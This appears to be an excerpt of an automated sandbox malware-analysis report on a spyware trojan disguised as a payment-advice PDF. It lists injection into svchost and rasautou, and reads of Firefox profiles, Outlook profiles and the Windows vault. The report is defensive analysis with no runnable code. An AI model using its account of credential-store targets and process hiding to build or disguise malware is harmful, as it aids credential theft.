                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049629A011_2_049629A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497696211_2_04976962
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0495EA8011_2_0495EA80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A16BD711_2_04A16BD7
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1AB4011_2_04A1AB40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1F43F11_2_04A1F43F
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0495146011_2_04951460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049FD5B011_2_049FD5B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1757111_2_04A17571
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A116CC11_2_04A116CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049A563011_2_049A5630
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1F7B011_2_04A1F7B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1F0E011_2_04A1F0E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A170E911_2_04A170E9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049670C011_2_049670C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A0F0CC11_2_04A0F0CC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496B1B011_2_0496B1B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A2B16B11_2_04A2B16B
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0494F17211_2_0494F172
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0499516C11_2_0499516C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049652A011_2_049652A0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A012ED11_2_04A012ED
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497B2C011_2_0497B2C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049A739A11_2_049A739A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1132D11_2_04A1132D
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0494D34C11_2_0494D34C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1FCF211_2_04A1FCF2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049D9C3211_2_049D9C32
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497FDC011_2_0497FDC0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A17D7311_2_04A17D73
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04963D4011_2_04963D40
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A11D5A11_2_04A11D5A
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04969EB011_2_04969EB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04961F9211_2_04961F92
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1FFB111_2_04A1FFB1
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04923FD211_2_04923FD2
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04923FD511_2_04923FD5
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1FF0911_2_04A1FF09
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049638E011_2_049638E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049CD80011_2_049CD800
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049F591011_2_049F5910
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0496995011_2_04969950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497B95011_2_0497B950
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A01AA311_2_04A01AA3
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049FDAAC11_2_049FDAAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049A5AA011_2_049A5AA0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A0DAC611_2_04A0DAC6
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A17A4611_2_04A17A46
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1FA4911_2_04A1FA49
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049D3A6C11_2_049D3A6C
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0497FB8011_2_0497FB80
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0499DBF911_2_0499DBF9
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_049D5BF011_2_049D5BF0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_04A1FB7611_2_04A1FB76
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A522F011_2_02A522F0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A6C14011_2_02A6C140
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A4D3E011_2_02A4D3E0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A4D1C011_2_02A4D1C0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A4B46011_2_02A4B460
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A53BAC11_2_02A53BAC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A53BB011_2_02A53BB0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_02A559B011_2_02A559B0
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0483E42811_2_0483E428
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0483E54311_2_0483E543
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0483E8DC11_2_0483E8DC
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: 11_2_0483D9A811_2_0483D9A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0382B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: String function: 00860AE3 appears 70 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: String function: 00868900 appears 42 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: String function: 00847DE1 appears 36 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 04995130 appears 58 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 049DF290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 0494B970 appears 277 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 049A7E54 appears 103 times
                Source: C:\Windows\SysWOW64\rasautou.exeCode function: String function: 049CEA12 appears 86 times
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279049819.0000000004113000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPaymentAdviceNote_pdf.exe
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1281026249.000000000430D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs rPaymentAdviceNote_pdf.exe
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@10/8
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AA06A GetLastError,FormatMessageW,0_2_008AA06A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008981CB AdjustTokenPrivileges,CloseHandle,0_2_008981CB
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008987E1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008AB3FB
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_008BEE0D
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008AC397 CoInitialize,CoCreateInstance,CoUninitialize,0_2_008AC397
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00844E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00844E89
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeFile created: C:\Users\user~1\AppData\Local\Temp\autA4FA.tmpJump to behavior
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1641099513.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1641158815.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3091557163.0000000002D33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: rPaymentAdviceNote_pdf.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"Jump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeProcess created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasdlg.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mprapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: rPaymentAdviceNote_pdf.exeStatic file information: File size 1226752 > 1048576
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lDBisuvfBkK.exe, 0000000A.00000002.3091104280.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3093155257.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: rPaymentAdviceNote_pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00844B37 LoadLibraryA,GetProcAddress,0_2_00844B37
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00868945 push ecx; ret 0_2_00868958
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00414118 push ebx; retf 8_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00414123 push ebx; retf 8_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004051D4 push ebx; retf 8_2_004051E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004151AD push edx; ret 8_2_004151AE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00412A2B pushfd ; iretd 8_2_00412A2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004032E0 push eax; ret 8_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00418A96 push edi; ret 8_2_00418A97
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040DB8C push esi; iretd 8_2_0040DB8D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004013B0 push eax; ret 8_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004013B0 push edx; ret 8_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004193BE push esp; retf 8_2_004193BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040D415 push cs; ret 8_2_0040D42F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004014C2 push eax; ret 8_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00414CE7 push ds; iretd 8_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00414CAD push ds; iretd 8_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040852B pushfd ; ret 8_2_00408534
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00401725 push edx; ret 8_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_00417F37 push ebp; ret 8_2_00417F38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004087BB push FFFFFFBBh; retf 8_2_004087BE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0380225F pushad ; ret 8_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038027FA pushad ; ret 8_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038309AD push ecx; mov dword ptr [esp], ecx8_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0380283D push eax; iretd 8_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03801368 push eax; iretd 8_2_03801369
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_043644C3 push esi; ret 10_2_043644CD
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_043615A9 push ebp; ret 10_2_043615AA
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04351E2D push FFFFFFBBh; retf 10_2_04351E30
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_04362E06 pushfd ; ret 10_2_04362E1B
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0435D795 push ebx; retf 10_2_0435D79F
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0435D78A push ebx; retf 10_2_0435D79F
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008448D7
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008C5376
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00863187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00863187
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
